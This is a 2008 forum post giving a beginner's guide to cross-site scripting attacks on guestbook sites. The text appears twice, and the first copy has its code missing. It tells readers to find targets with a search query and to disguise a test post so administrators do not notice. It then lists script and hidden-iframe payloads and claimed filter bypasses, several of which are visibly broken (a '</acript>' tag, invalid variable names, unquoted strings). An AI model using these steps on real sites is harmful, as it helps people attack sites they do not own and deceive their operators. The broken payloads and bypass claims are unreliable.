08-23-2008, 12:45 PM
This is a simple guide to XSS. I tried to include some common methods used for XSS injection so i hope you can find this usefull to hack.
Find a vunerable website:
Guestbooks are the most vunrable especially free guestbook scripts. You can search Google for something like:
that should bring up some vunerable sites. You can also do that on yahoo (if Google filters your requests as spam)
Test It:
Test if it is vunrable to this attack by posting something like:
basicly make it look like you were innocently trying to make your comment stand out or something so the site won't be suspicious.
In the example above if the text shows bold the site is vunrable. Basically the idea is if the html executes properly the site is open to XSS attacks.
If it is vunerable:
You can now do:
Or even
The first one displays a message box and the second one opens a website. Most XSS attacks will involve javascript or html because most people have javascript turned on in their browsers. A classic html XSS injection uses the <iframe> tag. This can be used to play music on the site! Just link it to a youtube video, give the width and height values 0 and it will play music in the background.
Help the javascript code didn't execute!
Sometimes a website may seem vunerable but won't execute code. This is mostly because the webiste has a filter to try and prevent XSS attacks from happening. There are ways around these filters though.
Examples include:
On some websites quotes are disabled but you can get around that by using this:
No quotes at all in that.
Well i hope you enjoyed this tutorial and i hope you will learn from it.
Good luck, OXY.
Find a vunerable website:
Guestbooks are the most vunrable especially free guestbook scripts. You can search Google for something like:
Code:
allinurl:/guestbook.phpthat should bring up some vunerable sites. You can also do that on yahoo (if Google filters your requests as spam)
Test It:
Test if it is vunrable to this attack by posting something like:
Code:
<b>Nice Site</b>basicly make it look like you were innocently trying to make your comment stand out or something so the site won't be suspicious.
In the example above if the text shows bold the site is vunrable. Basically the idea is if the html executes properly the site is open to XSS attacks.
If it is vunerable:
You can now do:
Code:
<script>alert('Hacked By OXY')</acript>Or even
Code:
<script>window.open("http://www.youtube.com/ironoxy")</script>The first one displays a message box and the second one opens a website. Most XSS attacks will involve javascript or html because most people have javascript turned on in their browsers. A classic html XSS injection uses the <iframe> tag. This can be used to play music on the site! Just link it to a youtube video, give the width and height values 0 and it will play music in the background.
Code:
<iframe src="http://www.youtube.com/A48SLD3.html" height="0" width="0" scrollbars="no">Help the javascript code didn't execute!
Sometimes a website may seem vunerable but won't execute code. This is mostly because the webiste has a filter to try and prevent XSS attacks from happening. There are ways around these filters though.
Examples include:
Code:
')<script>alert('Hello')</script>
");alert('Hi');
<script type=text/javascript>alert("Hacked")</script>
<script>var var = 1; alert(Haxed)</script>
<script>alert("/Hack Me"/)</script>
<script>alert("Hi OXY")</script>;
<script>alert("Greetz");</script>On some websites quotes are disabled but you can get around that by using this:
Code:
<script>var VarIt = Hello!; alert(VarIt)</script>Well i hope you enjoyed this tutorial and i hope you will learn from it.
Good luck, OXY.
